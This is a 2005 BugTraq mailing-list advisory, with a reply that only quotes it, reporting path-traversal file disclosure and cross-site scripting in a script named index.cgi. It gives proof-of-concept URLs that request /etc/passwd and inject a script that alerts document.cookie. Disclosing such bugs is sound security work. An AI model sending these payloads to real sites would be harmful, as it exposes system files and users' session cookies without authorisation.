BugTraq
Back to list
|
Post reply
index.cgi script XSS + file show
Apr 24 2005 09:08PM
fireboy fireboy (fireboynet webmails com)
(1 replies)
Tunis 24/04/2005
BUG found by fireboy
fireboy (at) webmails (dot) com [email concealed]
THERE ARE SOME BUGS IN index.cgi SCRIPT THAT CAN SHOW SENSILBLES FILES IN A SYSTEM
IT IS ONLY FOR SECURITY AND EDUCATIONAL PURPOSE
1)file showing
http://www.target.com/index.cgi?/etc/passwd
2)CSS
http://www.target.com/index.cgi?<script>alert(document.cookie)<
/script>
greetz to all magattack members www.magattack.tk
[ reply ]
Re: index.cgi script XSS + file show
Apr 25 2005 08:22PM
D.C. van Moolenbroek (xanadu chello nl)
Privacy Statement
Copyright 2010, SecurityFocus
Tunis 24/04/2005
BUG found by fireboy
fireboy (at) webmails (dot) com [email concealed]
THERE ARE SOME BUGS IN index.cgi SCRIPT THAT CAN SHOW SENSILBLES FILES IN A SYSTEM
IT IS ONLY FOR SECURITY AND EDUCATIONAL PURPOSE
1)file showing
http://www.target.com/index.cgi?/etc/passwd
2)CSS
http://www.target.com/index.cgi?<script>alert(document.cookie)<
/script>
greetz to all magattack members www.magattack.tk
[ reply ]